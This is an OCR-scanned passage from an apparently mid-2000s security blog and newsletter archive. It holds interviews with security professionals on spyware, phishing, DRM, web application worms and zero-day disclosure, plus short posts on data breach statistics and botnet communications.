defences and update those virus patterns on a daily basis! 


Astalavista 

: The threat and actual infections with spyware opened up an entire 

market for anti-spyware related services and products, whereas millions 

of people out there are still infected, and some are even unaware of it. 
What is your opinion on the recent government regulations targeting 
spyware vendors, but allowing "spy agencies" to use spyware? What do you 
think is going to happen on the spyware scene in the next couple of 

years? 


Anthony : Well, as | pointed out in your 

previous question, | tend to see Spyware almost in the same category as 
Trojans, Viruses and other malware. Subsequently | think things are 
going to get (much) worse before they (I hope, eventually) get better, 
and it is going to take some considerable changes in AV technology for 
one (along with our ways of thinking) to ensure people will not take 
advantage of these technologies to the disadvantage of others. 


Currently 

things are not looking too good: governments have proven that we cannot 
trust their ineffective and inevitably slow schemes and until 
better/additional technologies are invented to bolster our AV defences, 

we are pretty much sitting duck targets. This has been proven yet again 
with the recent "hijacking" of 1000’s of zombie/drone PCs to perform 
DDoS attacks, etc. So it is really up to the individuals to get at least 

some basic security measures up and running, and there are plenty of 
reputable web-sites out there to provide all the information one needs 

to secure themselves well. 
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Astalavista : Thanks for your time. 


Anthony : No problem! 


Interview with Dave Wreski, [36]http://www.linuxsecurity.com/ 


Astalavista : Dave, tell us something more about your background in the InfoSec industry 
and what is LinuxSecurity.com all about? 


Dave 

: [have been a long-time Linux enthusiast, using it before version 

v1.0 on my 386DX40 home PC, which prompted me to dump Windows shortly 
thereafter and I’ve never looked back. 


In early 1993 | began to 

realize the tremendous value that Linux could bring to the security 

issues | was facing. | found the decisions | was making, with regard to 
managing computer systems, were more and more based on the impact 
security had on the data residing on those systems. It’s certainly more 
challenging to keep the bad guys out than it is the other way round - 

the bad guys have to only be right once, while the good guys have to 
always make the right decisions. So | created a company to help ensure 
the good guys had the tools necessary to make the most effective options 
to keep their networks secure. 


The void in comprehensive 

information on security in the Linux space was the primary reason | 
started LinuxSecurity.com in 1996. Since then, we have seen millions of 
visitors make it their primary information resource. In fact, we’re 
completely revamping the site with new features, greater functionality 
and a whole new look -launching December 1st. 
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Astalavista : What was the most important trend in the open-source security scene during 


the last couple of years,in your opinion? 


Dave 
: Actually, there have been so many that it’s difficult to focus on any 
one in particular. Certainly, the adoption of open standards by many 


vendors and organizations makes it much easier to communicate between 


disparate systems securely. The maturity of the OpenSSH/OpenSSL 
projects, IPsec, and even packet filtering has enabled companies, 
including Guardian Digital, to create solutions to Internet security 
issues equal to, or better than, their proprietary counterparts. 


Astalavista 

: The monopolism of Microsoft in terms of owning more than 95 % of the 
desktops in the world has resulted in a lot of debates on how insecure 
the whole Internet is because of their insecure software. Whereas my 
personal opinion is that if Red Had had 95 % of the desktop market, the 
effect would be the same. Do you think their software is indeed 
insecure, or it happens to be the one most targeted by hackers? 


Dave 

: | think the mass-market Linux vendors try to develop a product that’s 
going to provide the largest numbers of features, while sacraficing 
security in the process. They have to appeal to the lowest common 
denominator, and if that means delivering a particular service that is 
requested by their customers, then much of the responsibility of 
security falls on the consumer, who may or may not be aware of the 
implications of not maintaining a secure system, and in all likelihood, 
do not possess the ability to manage the security of their system. 


Astalavista 

: The appearance of Gmail and Google Desktop had a great impact on the 
privacy concerns of everyone, however these expanditures by Google 
happened to be very successful. Do you think there’s really a privacy 
concern about Google, their services and privacy policy, and, most 
importantly, the future of the company? 


Dave : 
No, not really. | actually think that most of us gave up our privacy 
years ago, and any privacy that remains is only in perception. There’s 
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far more damage that could be done 


through things like the United 

States Patriot Act than there is through Google reading your general 
communications. Anyone who has half a brain and wants to make sure their 
communications are not intercepted is using cryptography for electronic 
issues. 


Astalavista : We've recently seen an 

enormous increase of phishing attacks, some of which are very 
successful. What caused this in your opinion? What is the way to limit 
these from your point of view? 


Dave : Reduce the 

human factor involvement somehow. Phishing is just the new "cyber" term 
for social engineering, which has existed forever. Through the efforts 

of Guardian Digital, and other companies concerned about the privacy and 
security of their customers’ data, we are making great strides towards 
user education, and providing tools for administrators to filter 
commnications. 


Astalavista : Spyware is another 

major problem that created an industry of companies fighing it, and 
while the government is slowly progressing on the issue, the majority of 
PCs online are infected by spyware. Would you, please, share your 
comments on the topic? 


Dave : This issue is 

different from issues such as phishing because the end-user is not aware 
is it occurring. The responsibility here falls directly on the 

operating system vendor to produce an 


environment where security is 

maintained. In other words, by creating software that enables the 
end-user to better define what constitutes authorized access, users can 
develop a situation where this type of attack does not succeed. In the 
meantime, application-level security filters and strict corporate 
information policies thwart many of these types of attacks. 


Astalavista 
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: What do you think will happen in the near future with Linux vs. 
Microsoft? Shall we witness more Linux desktops, or entire countries 
will be renovating their infrastructure with 


Unix-based operating systems? 


Dave 

: We are already seeing a growing trend on an international level in 

the migration from Windows operating systems to Linux. Guardian Digital 
has implemented several Linux-based solutions for multi-national and 
international corporations who recognize the costs and security risks 
associated with a Windows system, and if our business is any indication 
of the growth potential, I’d say Microsoft is going to have a real fight 

on their hands. 


Although I’m not too involved in the desktop 
space itself, |am completely comfortable with my cobbled-together Linux 
desktop, much more than just a few years ago. | think that as more 


and 

more computing tasks become distributed - moved from the desktop to 
being powered by a central server - it will become easier to rely on 
Linux on the desktop and the growth will continue. 


Interview with Mitchell Rowton, [37]http://www.securitydocs.com/ 


Astalavista 

: Hello Mitchell, would you please tell us something more about your 
background in the information security industry, and what is 
SecurityDocs.com all about? 


Mitchell : | joined 

the US Marine Corps after high school. There | worked a helpdesk for a 
year or so before moving on to being a server administrator. After a 

while | became more and more interested in the networking side of things 
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(switches and routers.) Firewalls weren’t used that often back then, 
and one day | was asked to put up an access-control list (ACL) on our 
borderrouter. After that | started getting more and more security 
responsibility. When | left the Marine Corps | used my security 
clearance to get a job as a DoD contractor, then a contractor in the 
health care industry. 


By this time in my life | had a wife and 

kids. So | took a job that was more stable and didn’t have as much 

travel closer to home. When | think back, this is probably when the idea 
behind SecurityDocs.com was born. While | was leaving one job and going 
to another | was told to do a very in depth turnover about starting an 
incident response team at the company. So how do you explain how to 
start an incident response team at a fortune 500 company in a turnover 
document? After a while | gave up and put several dozen links to white 
papers that discuss starting an incident response team. 


Basically 

that’s what SecurityDocs.com is - a collection of security white papers 
that are organized into categories so that it’s easy for someone to 
learn any particular area. 


Astalavista : The 

media and a large number of privacy concious experts keep targeting 
Google and how unseriously the company is taking the privacy concerns of 
its users. What is your opinion on that? Do you think a public company 
such as Google should keep to its one-page privacy policy and 
contradictive statements given the fact that it’s the world’s most 

popular 


search engine? 


Mitchell : | should 

start off by saying that my company makes money through Google’s Adsense 
program. That being said, it seems like most of the media hoopla 
surrounding Google privacy has centered around gmail and desktop search. 

| just don’t see a problem with either of these issues. | signed up for 

gmail knowing that | would see targeted text ads based on the content 

of e-mail that | was viewing. 
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And | know that Google is going to 

learn some general stuff about everyones desktop searching habits. They 
will know that pdf’s are searched for more often than spreadsheets and 
other non-specific information. None of which is personally 

identifiable. 


Astalavista : Phishing attacks are 

on the rise, each and every month we see an increasing number of new 
emails targeting new companies. What do you think of the recent exploit 
of the SunTrust bank web site? Are users really falling victims to these 
attacks or even worse, they’re getting even more scared to shop online? 


Mitchell 

: The blame in this specific case falls mostly with the bank, but also 

on the users. | can’t remember the last time my bank asked me for my atm 
or credit card number on a non-secure page. That being said, | know 

that my grand mother would probably fall for this. Sure users should 

check for SSL Certificates and use common sense. But more importantly 
financial institutions should not allow cross site scripting or 

malicious scripting injections. 


If this type of phishing 

continues to rise then | imagine it will make the average user a little 

more worried about giving information online. This is bad for companies, 

but as a security guy, | think that most users should be more worried 

about who they give their information to. There are a lot of phishing 

attacks that have nothing to do with the [38]institutions. In cases like this, users must use 
some basic security common sense or risk getting scammed. 


Astalavista 

: What used to be a worm in wild launched by a 15 years old kid or 
hactivist, has recently turned into "DDoS services on demand", what do 
you think made this possible? Is it the unemployed authors themselves, 
the real criminals realizing the potential of the Internet, or the 

unethical competition? 


Mitchell : I’m sure it’s a 

combination of all three. But it’s also getting more popular because it 
hurts more today than it used to. Five years ago an organizations web 
site was uSually littlke more than an online brochure that wasn’t too 
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important in the scheme of things. Today their website is probably 
tightly integrated into their business model, and will cause a large 
financial and reputation loss if it is compromised or unusable. 


The 

first step in doing a security assessment is to determine what’s really 
important. Most companies should realize that having the same security 
mechanisms in place that they had three years ago is putting them more 
and more at risk because these security mechanisms are protecting 
information that gets more important every day. 


Astalavista 

: Recently, the FBI has been questioning Fyodor, the author of NMAP 
over accessing server logs from insecure.org. Do you think these 
actions, legal or not, can have any future implications on the users’s 
privacy at other web sites? | mean, next it could be any site believed 
to be visited by a criminal, and besides all how useful this information 
might be in an investigation? 


Mitchell : | had a 

mixed reaction when | first read about this. But | must say that Fyodor 
handled this superbly. He sent an e-mail out telling people what was 
happening and explaining that he was only complying with properly served 
subpoenas. He also puts things into perspective. If someone hacks into a 
server and downloads nmap at a specific time, then perhaps law 
enforcement should be able to view the nmap server logs for that 
specific time. On the other hand what if | were also downloading NMap at 
that time? | personally wouldn’t care if anyone knows that | download 
nmap, but | can also understand why other people would be bothered by 
this. Overall | agree with very narrow subpoenas directed at specific 

time periods and source I|P’s. 
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2.1.32 Personal Data Security Breaches - 2000/2005 (2006-01-26 18:04) 


[1] Another invaluable CRS report that | came across to, including detailed 
samples of all the [2]data security breaches in between 2000 and 2005(excluding the ones not 
reported or still undergoing of course), covering : 


- The accident 

- Data publicized 

- Who was affected 

- Number of affected 


- Type of data compromised 
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- Source of the info 


Here are some cases worth mentioning as well : 


1. [3]Ilndiana University - malicious software programs installed on business instructor’s 
computer, November, 2005 


2. [4]University of Tennessee -inadvertent posting of names and Social Security num- 
bers to Internet listserv, October, 2005 


3. [5]Miami University 
(Ohio) - report containing SSNs and grades of more than 20,000 students 
has been accessible via the Internet since 2002, September, 2005 


4. [6]Kent State University - five desktop computers stolen from campus, 100,000 peo- 
ple affected, September, 2005 


5. [7]University of Connecticut 

-hacking - rootkit (collection of programs that a hacker uses to mask 
intrusion and obtain administrator-level access to a computer or 
computer network)placed on server on October 26,2003, but not detected 
until July 20, 2005 


Quite a huge number of exposed people, and 

20 % of the problem represents lost or stolen laptops or tapes, the rest 
is direct hacking of course. It’s impressive how easy is to get access 

to sensitive, both personal and financial information though what is 
already stored somewhere else in a huge and plain-text database for 
sure. And that simply shouldn’t be allowed to happen, or at least 
someone has to be held accountable for not taking care of the 
confidentiality of the information stored. 


Technorati tags : 


[8]security,[9 information security,[10]id theft,[11]security breach,[12]security statistics 
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2.1.33 Skype to control botnets?! (2006-01-26 18:13) 


[1] | just read an article from CNET on how "[2]Skype could provide 
botnet controls", with which | totally disagree. Skype and VoIP communications can actually 
provide [3]botner herders 

with the opportunity to communicate, compared to acting as a platform 

for malicious attacks. 


And old fashioned DDoS attacks the way we know 

them work damn well as a concept. Years ago, quite some :) linux boxes 

worming was on the rise the [4]Honeynet Project was conducting [5]Joutstanding research 
to build awareness on this fact. These days, with the penetration of 

broadband, and the thousands of users with ISP like bandwidth make the 

need to look for bandwidht irrelevant. Instead of breaching into core 

routers and looking for bandwidth, that DDoS attack power is gathered 

through the collective breaching of thousands of hundreds unprotected, 

unaware or naive end users. 
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Botnet communications are evolving each time 
a new disrupting technology pops up, on the other hand, botnet herders 
are having trouble in finding out the exact number of their botnet due 


to lack of server capacity, and as I’ve once mentioned in my [6]Malware - future trends 


research, encryption seems to be the logical move. 


And the trade off 

would eventually be the delays of communication given the size of the 
botnet and the encryption approaches of course. Bots that lack the 
weakness of idleness on public IRC servers are already "talking" and 
trying to act as legit as possible, my point is that the bigger a botnet 
gets, the harder is to maintain it, that’s logical, and it’s good news 

for everyone, until someone standardize a possible communication 
protocol. 


Scary thoughts, but a simple botnet/malware communication 

protocol could for instance cause a lot of troubles for everyone. Is 
centralization of botnets a good thing for the industry in respect to 
tracking them, and how would things evolve? Skype is totally out of the 
question from my point of view, or is it not? 
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Some nice insights on botnet communications can be found at : 


[7]The Zombie Roundup: Understanding, Detecting, and Disrupting Botnets 


Technorati tags : 


[8]security,[9]information security,[10]malware,[11]botnets,[12]skype 
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2.1.34 Security Interviews 2004/2005 - Part 3 (2006-01-26 18:46) 


Part 3 includes : 
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. Eric Goldman - [1]http://www.ericgoldman.org/ - 2005 
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. Robert - [2]http://www.cgisecurity.com/ - 2005 
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. Johannes B. Ullrich - [3]http://isc.sans.org/ - 2005 
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. Daniel Brandt - [4]http://google-watch.org/ - 2005 
21. David Endler - [5]http://www.tippingpoint.com/ - 2005 
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. Viadimir, ZARAZA - [6]http://security.nnov.ru/ - 2005 
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Go through [7]Part 1 and [8]Part 2 as well! 


Part of [9]Asta’s Security Newsletter 


Interview with Eric Goldman, [10]http://www.ericgoldman.org/ 


Astalavista 
: Hi Eric, would you, please, introduce yourself to our readers and 
share some info about your profession and experience in the industry? 


Eric : | am an Assistant Professor of Law at [11]Marquette University Law School 
in Milwaukee, Wisconsin. | have been a full-time professor for 3 years. 

Before becoming an academic, | was an Internet lawyer for 8 years in 

the Silicon Valley. | worked first at a private law firm, where most 


of 

my clients were Internet companies that allowed users to interact with 

other users (eBay was a leading example of that). Then, from 2000-2002, | 

worked at [12]Epinions.com 

(soon to be part of eBay) as its general counsel. As an academic, | 

principally spend my time thinking and writing about Internet law 

topics. Some of my [13]recent papers have addressed warez trading, spam, search engine 
liability and adware. | run two blogs: [14]Technology & Marketing Law Blog, where we discuss 
many Internet law, IP law and marketing law topics, and [15]Goldman’s Observations, a 
personal blog where | comment on other topics of interest. 


Astalavista 

: Teaching tech and Internet-savvy students on CyberLaw and Copyrights 
infringement is definitely a challenge when it comes to influencing 
attitudes, while perhaps creative when it comes to discussions. What’s 
the overall attitude of your students towards online music and movies 
sharing? 


Eric : Students have a variety of 
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perspectives about file sharing. Some students come from a content owner 
background; for example, they may have been a freelance author in the 
past. These students tend to strongly support the enforcement efforts of 
content owners, and they view unpermitted file sharing as 

stealing/theft, etc. Other students come from a technology background 
and subscribe to the “information wants to be free? philosophy. These 
students come into the classroom pretty hostile to content owners’ 
efforts and tend to be fatalistic about the long-term success of 
enforcement efforts. However, | think both of these groups are the 
minority. | think the significant majority of students do not really 
understand how copyright law applies to file sharing. They learned how 
to share files in school and do so regularly without fully understanding 
the legal ramifications. Usually, their thinking is: “if everyone is 

doing it, it must be OK.? These students tend to be surprised by the 
incongruity between their behavior and the law. Even when we discuss the 
rather restrictive nature of copyright law, these students are not 

always convinced to change their behavior. Deep down, they still want 
the files they want, and file sharing is how they get those files. As a 
result, I’ll be interested to see how attitudes evolve with the 

emergence of legal download sites like iTunes. | suspect these sites may 
be retraining students that there is a cost-affordable (but not free) 

way to get the files they want. We’ll see how this changes the classroom 
discussions! 


Astalavista : Where do you think 

is the weakest link when it comes to copyright infringement of content 
online, the distribution process of the content or its development 
practices? 


Eric : With respect to activities 

like warez trading, consistently the weakest link has been insiders at 
content companies. Not surprisingly (at least to security 

professionals), employees are the biggest security risk. | do think 

content owners are aware of these risks and have taken a number of steps 
to improve in-house security, but the content owners will never be able 

to eliminate this risk. I’d like to note a second-order issue here. 

Content owners have historically staggered the release of their content 
across different geographical markets. We’ve recently seen a trend 


towards content owners releasing their content on the same day worldwide (the most recent 
Harry Potter book is a good example of that). | think the content owners’ global release of 
content will reduce some of the damage from warez traders distributing content before it’s 
been released in other geographic markets. So as the content owners evolve their distribution 
practices, they will help limit the impact of other weak links in the distribution process. 
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Astalavista 

: Do you envision the commercialization of P2P networks given the 
amount of multimedia traded there, and the obvious fact that Internet 
users are willing to spend money on online content purchases (given 
Apple’s Itune store success, even Shawn Fanning’s Snocap for instance) 
given the potential of this technology? 


Eric : 

Personally, I’m not optimistic about the commercialization of the P2P 
networks. The content owners continue to show little interest in 
embracing the current forms of technology. | think if the content owners 
wanted to go in this direction, they would have done so before spending 
years and lots of money litigating against Napster, Aimster, Grokster 
and Streamcast. 


In my opinion, without the buy-in of the content 

owners, P2P networks have little chance of becoming the dominant form of 
commercialized content downloads. So | think, for now, we’ll see much 
more content owners’ efforts directed towards proprietary download sites 
than cooperation with the P2P networks. 


Astalavista 
: Were spyware/adware as well as malware the main influence factors for 
users to start legally purchasing entertainment content online? 


Eric : We have some evidence to suggest otherwise. A recent [16]study 
conducted at UC Berkeley watched the behavior of users downloading 
file-sharing software. The users didn’t understand the EULAs they were 
presented with, so they were not very careful about downloading. But, 
more importantly, the users persisted in downloading file-sharing 
software even when they were told and clearly understood that the 
software was bundled with adware. If this result is believable, users 

will tolerate software bundles—even if those bundles are risky from a 
security standpoint—so long as the software will help them get where 
they want. 


Instead, | would attribute the comparative success of 

the music download sites to their responsiveness to consumer needs. 
Consumers have made it clear what they want—they want music when they 
want it, they want to listen to it in the order of their choosing, they 
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want to pay a low amount for just the music they want (not the music 
they don’t), they want the interface to be user-friendly and they want 
to deal with trustworthy sources. Also, consumers have surprisingly 
eclectic tastes, so any music download site must have a large database 
that’s 


diverse enough to satisfy idiosyncratic tastes. The most 

recent generation of music download sites have finally provided an 
offering that satisfies most of these key attributes. They aren’t 

perfect yet, but the modern sites are so much better than prior offering 
where the pricing was off, the databases were incomplete, or the sites 
were still trying to tell consumers how they should enjoy the music 
(rather than letting the consumers decide for themselves). 


P2P 

file-sharing networks still serve a consumer need, but the content 

owners have succeeded some in increasing the search costs that consumers 
have to receive (such as by using spoof files). As consumer search 

costs using file-sharing increase, legal downloading sites with 

efficient search/navigation interfaces become more attractive. 


Astalavista : How would you explain the major investments of known companies 


into spyware/adware? Is it legal but unethical from a moral point of view? 


Eric 

: I’m a little contrarian on this topic, so | may be unintentionally 
controversial here. From my perspective, we should start with a basic 
proposition: adware and spyware are not inherently evil. Like many other 
technologies, adware and spyware are good technology capable of being 
misused. Indeed, | think adware and spyware are an essential part of our 
future technological toolkit—perhaps not in the existing form, but in 

some form. We should not dismiss the technology any more than we should 
dismiss P2P file sharing technology simply because many users choose to 
engage in illegal file sharing using it. 


Once we realize that 

adware and spyware are not necessarily bad and could even be useful, 

then it makes sense that major brand-name companies are working with 
adware/spyware. Adware and spyware offer new—and potentially better—ways 
to solve consumers’ needs, so we should expect and want companies to 
continue innovating. Let me give an example. | use Microsoft XP and it 
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constantly watches my activities. Indeed, in response to my 
actions/inactions, | get lots of pop-up alerts/notifications....“updates 

are available? “you are now connected online? “we have detected a 
virus? etc. | want my operating system to be monitoring my behavior 
and alerting me to problems that need my attention. In fact, I’d be 
happy if Microsoft fixed problems that don’t need my attention without 
even disturbing me. Microsoft is aware of this and is working on 
technological [17]innovations to be smarter about when it delivers alerts. 


So 

from my perspective, Microsoft is in the spyware business. They have 
huge investments in spyware. I’m glad they are making these investments 
and | hope they find even better ways to implement their software. | 

think adware and spyware have been maligned because a number of 
otherwise-legitimate marketers have engaged in (and may continue to 
engage in) some questionable practices. These practices can range from 
deceptive/ambiguous disclosures to exploiting security holes. | remain 
optimistic that legitimate businesses will evolve their practices. We’ve 
seen movement by companies like Claria (eliminating pop-up ads), WhenU 
(deliberately scaling back installations by taking more efforts to 

confirm that users want the software) and 180solutions (cleaning up its 
distribution channels). This is not to say that we’ve reached the right 
place yet, but I like to think that the major adware companies will 
continue to improve their practices over time. 


However, there 

will also be people who will disseminate software that is intended to 
harm consumers, such as by destroying or stealing data. We have to 
remain constantly vigilant against these threats. But they are far from 
new; we’ve had to deal with malicious virus writers for a couple of 
decades. In thinking about the policy implications, we should not lump 
the purveyors of intentionally harmful software together with legitimate 
businesses that are evolving their business practices. 


Astalavista 

: Do you think the distributed and globalized nature of the Internet is 
actually the double edged sword when it comes to fighting/tracing cyber 
criminals and limiting the impact of an already distributed/hosted 
copyrighted information? 


Eric : There’s no 
question that the global nature of the Internet poses significant 


159 


challenges to enforcement against infringement and criminals. While this 
is mostly a problem, the need for cross-border coordination creates an 
opportunity for governments to develop compatible laws and legal 
systems, and there could be real long-term benefits from that. 


Astalavista 
: What’s your opinion on the current state of DRM (Digital Rights 
Management) when it comes to usefulness and global acceptance? 


Eric 

: | Know DRM is pretty unpopular in a lot of circles, especially 

academic circles. Personally, | don’t have a problem with DRM. | look at 
DRM as a way of determining the attributes of the product I’m buying. 
Consider the analogy to physical space. When | buy a car, most 
manufacturers give me some options to purchase. For example, | can 
upgrade the seat covers to the leather package if I’m willing to pay for 
that. The manufacturer could make that choice for me (and sometimes 
they do), but when it’s my choice, | can pay for what | value. DRM is a 
way of creating different product attributes in digital bits. In theory, 
with DRM, | can buy 24 hour viewing rights, 1 year viewing rights or 
perpetual viewing rights. Depending on my needs, | may prefer to pay 
less and get less, or | may want the perpetual rights and will happily 
pay more for that. Without DRM, we’ve relied on physical nature of the 
content storage medium, plus post-hoc copyright infringement 
enforcement, to establish those different attributes. DRM does a much 
more effective job of defining the product. Therefore, DRM gives the 
content owners new ways to create products that respond to consumer 
needs. Of course, consumers need to understand what they are buying when 
it’s controlled by DRM, but that’s a consumer disclosure issue that 
we've encountered in lots of contexts before. 


As far as | can 

tell, consumers have no problem with DRM. Indeed, the comparative 
success of download sites like iTunes indicates that consumers don’t 
really care about DRM so long as they can get what they want. 


Astalavista : In conclusion, | would really appreciate if you share your comments 


about the Astalavista.com site and, particularly, about our security newsletter? 
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Eric 

: My first introduction to your site was when one of my articles was 
linked on the site. My traffic immediately took off like a rocket ship. | 
was very impressed with the quantity and 


sophistication of your readers. Thanks for giving me an opportunity to speak with them. 


Interview with Robert, [18]http://www.cgisecurity.com/ 


Astalavista 
: Hi Robert, would you, please, introduce yourself to our readers and 
share some info about your profession and experience in the industry? 


Robert 

: | first started to get interested in the hacker/security aspect of 

computers in the 90’s in high school where | had my first brush with a 

non ‘windows/mac system’ called ’VMS’ (a VAX/VMS system to be exact). A 

yearlater | *finally* got access to an internet connection and to my 

amazement discovered that it was possible to break into a website with 

nothing more than your browser which was something | found to be rather 

interesting. This *interest* grew into a website | originally hosted on 

xoom (some free hoster | forget which :) that later became 

CGISecurity.com in September of 2000 where I’ve published numerous 

articles and white papers pertaining to website security. In 2003 | 

‘sold out’ (get paid to do what you’d do for free ) and was hired to 

perform R &D; and QA on a Web Application Security Product where | am 

to this day. In 2004 | Co Founded [19]’The Web Application Security Consortium’ with 
[20]Jeremiah Grossman 

to provide an outlet for some projects that multiple people we knew 

where interested in participating in. A year later | created [21]’The Web Security Mailing List 
as a forum where people can freely discuss all aspects of Web Security where | am currently 
the lead list moderator. 


, 


Astalavista 

: Recently, there’s been a growing trend towards the use of automated 
code auditing/exploitation tools in web applications security. Do you 
believe automation in this particular case gives a false sense of 
security, and provides managers with point’n’click efficiency, compared 
to a structured and an in-depth approach from a consultant? 


161 


Robert 

: Scanners provide a good baseline of the common types of issues that 
exist but are not magic bullets. It shouldn’t come to a surprise to you 

but many of these consultants use these automated scanning tools (Both 
freeware and commercial) in conjunction with manual review and simply 
verify the results. The skill of the person using any specialized 

product greatly impacts the end result. Someone with a good security 
understanding can save immense amounts of time by using such an 
automated product. If your organization doesn’t have a 'security guy’ 


then a consultant may be the best solution for you. 


Astalavista 

: Phishers are indeed taking a large portion of today’s e-commerce 
flow. Do you believe corporations are greatly contributing to the 
epidemic, by not taking web security seriously enough to ensure their 
web sites aren’t vulnerable to attacks in favour of online scammers? 


Robert 

: Phishing doesn’t *require* that a website be vulnerable to anything 

it just simply requires a look alike site exploiting a users lack of 
security education and/or patches. | wouldn’t say they are contributing 
towards it, but | do think that educating your user (as best as you can) 


is a requirement that should be in place at any online organization. 


Astalavista 

: What are you comments on the future use of web application worms, 
compared to today’s botnets/scams oriented malware? What are the 
opportunities and how do you picture their potential/use in the upcoming 
future? 


Robert : In 2005 we saw a rise in the 

use of search engines to ‘data mine’ Vulnerable and/or suspect hosts. 
Some of the larger search engines are starting to put measures in place 
such as daily request limitations, CAPTCHA’s, and string filtering to 

help slow down the issue. While these efforts are noteworthy they are 
not going to be able to prevent *all* malicious uses 


a search engine 
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allows. | think the future web worms’ will borrow methodologies from 
security scanners created to discover new vulnerabilities that will have 
no patches available. While the downside of this is to slow infection 
rates and lots of noise, the upside is infecting machines with no vendor 
supplied patch available because the ’vendor’ may be a consultant or ex 
employee who is no longer available. Worms such as Nimda infected both 
the server and its visitors making it highly effective and | expect this 
user/server trend to increase in the future. | also suspect a switch 
towards ‘data mining’ worms, that is worms that are trying to steal 
useful data. Modern day versions of these worms steal cd keys to games 
and operating systems. The use 


of worms to seek and steal data from a 

server environment, or user machine is only going to grow as credit 

card and identity theft continue to grow. While investigating a break-in 
into a friends ISP | discovered the use of a shopping cart ’kit’ left 

behind by the attacker. This kit contained roughly 8 popular online 
shopping carts that where modified to grab copies of a customers order, a 
‘shopping cart rootkit’ if you will. | suspect some type of automation 

of either auto backdooring of popular software or uploading modified 
copies to start creeping its way into future web worms. In 2002 | wrote 

an article titled [22]’Anatomy of the web application worm’ describing some of these ’new’ 
threats that web application worms maybring to us. 


Astalavista 

: Is the multitude and availability of open-source or freeware web 
application exploitation tools benefiting the industry, resulting in 
constant abuse of web servers worldwide, or actually making the 
situation even worse for the still catching up corporations given the 
overall web applications abuse? 


Robert : This 

entirely depends on the ‘product’. There are tools that allow you to 
verify if a host is vulnerable without actually exploiting it which | 
consider to be a good thing while some of these ‘point and root’ tools 
are not helping out as many people as they are hurting. In the past 


few 

years a shift has started involving ‘full disclosure’ where people are 
deciding not to release ./hack friendly exploits but are instead 
releasing ‘just enough detail’ for someone to verify it. This shift’ is 
something that | fully support. 


Astalavista : 
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CGlSecurity.com has been around for quite a few years. What are your 
plans for future projects regarding web security, and is it that you 

feel the industry is lacking right now - awareness, capabilities or 
incentives to deal with the problem? 


Robert : 

Actually September 14th will be the 5th year anniversary of 
CGISecurity.com. Right now I’m heavily involved in "The Web Application 
Security Consortium’ where we have numerous projects underway to provide 
documentation, education, and guides for users. | plan on expanding 
CGlSecurity into a one stop shop for all ‘web security’ related 

documentation where you can (hopefully) find just about anything you 

could ever need. To answer the second part of your question I’d say 

all three with awareness (education) being the biggest problem. 


One of 

the things that the industry hasn’t ‘gotten’ yet (in my opinion) is 

security review throughout an application’s lifecycle. Sure developers 

are starting to take ’secure development’ more seriously but as many 

of your readers know deadlines hamper good intentions and often 
temporary solutions (if at all) are put in place to make something work 

in time for release. This is why we need security review during all 

phases of the cycle not just during development and post production. | 
think that a much overlooked aspect of the development cycle is Quality 
Assurance. QA’s job is to ensure that a product works according to 
requirements, identify as many pre release (and post release) bugs as 
possible, and to think about ways to break the product. | think that 

more companies need to implement ’QA security testing’ as a release 
requirement as well as train their testers to have a deeper 

understanding of these ‘bugs’ that they’ve been discovering. You’ve 

heard the term ‘security in layers’ so why can’t this process be 
implemented throughout most development cycles? Developers get busy and 
may overlook something in the rush to meet the release date which is why 
(before release) 


they need someone double checking their work (QA) before it goes production. 
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Astalavista 
: In conclusion, | would like to ask you what is your opinion of the 
Astalavista.com’s web site and, in particular, our security newsletter? 


Robert 

: | first discovered astalavista in my ‘referrer’ logs when it linked 

to one of my articles. Since then I’ve been visiting on and off fora 

few years and only recently discovered the newsletter which | think is a 
great resource for those unable to keep up with all the news sites, and 
mailing list postings. 


Interview with David Endler, [23]http://www.tippingpoint.com/ 


Astalavista 
: Hi Dave, would you, please, introduce yourself to our readers and 
share with us some info about your experience in the industry? 


Dave 
: Sure, I’m 6’1", a Leo, | like long walks on the beach, coffee ice 


cream,*H*H*H*H*H*H“H .. . oh, sorry, wrong window. I’m the Director of 


Security Research at 3Com’s security division, TippingPoint. Some of the 
functions that fall under me include 3Com’s internal product Security 


testing, 3Com Security Response, and the Digital Vaccine team Responsible 


for TippingPoint IPS vulnerability filters. Prior to 3Com, | was the 


director of iDefense Labs overseeing vulnerability and malware research. 


Before that, | had various security research roles with Xerox 
Corporation, the National Security Agency, and MIT. 


Astalavista 
: What’s the goal of your Zero Day Initiative, how successful is your 
approach so far, and what differentiates it from iDefense’s one? 


Dave 

: Over the past few years, no one can deny the obvious increase in the 
number of capable security researchers as well as the advancement of 
publicly available security researching tools. We wanted to tap into 
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this network of global researchers in such a manner as to benefit the 
researchers, 3Com customers, and the general public. Our approach was 
the construction 


of the [24]Zero Day Initiative (ZDI), , launched on August 15, 2005. The main goals be- 
hind the program are: 


a.) Extend 3Com’s existing vulnerability research organization by leveraging 
the methodologies, expertise, and time of others. 

b.) Responsibly report Oday vulnerabilities to the affected vendors 

c.) Protect our customers through the TippingPoint Intrusion 

Prevention Systems (IPS) while the product vendor is working on a patch 

d.) Protect all technology end users by eliminating Oday vulnerabilities 
through collaboration with the security community, both vendors and 


researchers. 


The 

ZDI has had an incredibly positive result in only three months of 

activity, far exceeding our expectations. To date we have had over 200 

researchers sign up through the portal, and received over 100 

vulnerability submissions. We suspect that part of the early success of 

the program can be attributed to the wild launch party we threw at [25]Blackhat/Defcon 2005. 


The 

ZDI is different from iDefense’s program in a number of ways. 3Com has 
invested considerable resources to ensure the success of the ZDI. As a 
result, ZDI contributors will receive a much higher valuation for their 
research. We provide Oday protection filters for our clients, without 
disclosing any details regarding the vulnerability, through our 
TippingPoint IPS, as opposed to simply selling vulnerability details 

in advance of public disclosure. Finally, we altruistically attempt to 
protect the public at large by sharing the acquired Oday data with other 
security vendors (yes, this includes competitors) in an effort to do 

the most good with the information we have acquired. We feel we can 
still maintain a competitive advantage with respect to our customers 
while facilitating the protection of a customer base larger than our 

own. 
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Astalavista : Oday vulnerabilities have 

always been a buzzword in the security community, while in recent years 
decision makers have started realizing their importance when evaluating 
possible solutions as well. What’s the myth behind Oday vulnerabilities 
from your point of view, 


and should it get the highest priority the way I’m seeing it recently? 


Dave 

: Certainly not all vulnerabilities should be treated equally, 

including Oday. A typical vendor-announced vulnerability can be just as 
devastating as a Oday due to the trend of shrinking windows of time for 
exploit release. Obviously, for an organization or home user that 
doesn’t stay up-to-date with security patches, a three-year old exploit 
for a patched vulnerability could be just as devastating as a Oday 
exploit. | think Oday vulnerability protection has begun to take more 
shape in security buying decisions simply due to the growing frustration 
and helplessness felt by users when vendors take a long time to patch 
